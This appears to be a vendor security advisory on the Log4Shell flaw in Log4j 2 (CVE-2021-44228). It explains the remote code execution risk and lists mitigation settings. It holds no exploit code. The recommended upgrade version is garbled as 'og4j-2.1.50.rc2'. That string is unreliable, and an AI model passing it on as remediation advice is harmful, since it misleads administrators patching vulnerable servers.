UPDATE: Cybereason researchers have released an updated "vaccine” with permanent mitigation option for the Log4Shell vulnerabilities (CVE-2021-44228 and CVE-2021-45046) which is freely available on GitHub and relatively simple to implement... - more details here...
A newly revealed vulnerability impacting Log4j 2 versions 2.0 to 2.14.1 was disclosed on the project’s GitHub on December 9, 2021, and designated as CVE-2021-44228 with the highest severity rating of 10. The flaw has been dubbed Log4Shell.
Log4j 2 is an open source Java logging library that is widely used in a range of software applications and services around the world. The vulnerability can allow threat actors the opportunity to take control of any Java-based, internet-facing server and engage in Remote Code Execution (RCE) attacks.
From CVE-2021-44228 detail: “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.” The impact from this vulnerability is likely to be very widespread. There are already reports that threat actors are actively engaged in mass Internet scanning to identify servers vulnerable to exploitation.
Cybereason is aware of the vulnerability and has completed verification that this issue does not affect Cybereason products or services.
For those who are concerned about closing third-party vulnerabilities (i.e., products aside from Cybereason), the following are some proactive measures organizations can take to reduce the risk posed by CVE-2021-44228:
-
- Upgrade to Apache og4j-2.1.50.rc2, as all prior 2.x versions are vulnerable
- For Log4j version 2.10.0 or later, block JNDI from making requests to untrusted servers by setting the configuration value log4j2.formatMsgNoLookups to “TRUE” to prevent LDAP and other queries
- Default both com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to "FALSE" to prevent Remote Code Execution attacks in Java 8u121
If you believe your organization has already potentially been compromised through exploitation of CVE-2021-44228, contact the Cybereason Incident Response Team or reach out to your Cybereason representative for immediate assistance. We are here to help and will provide tools and information to assist others as this vulnerability continues to evolve.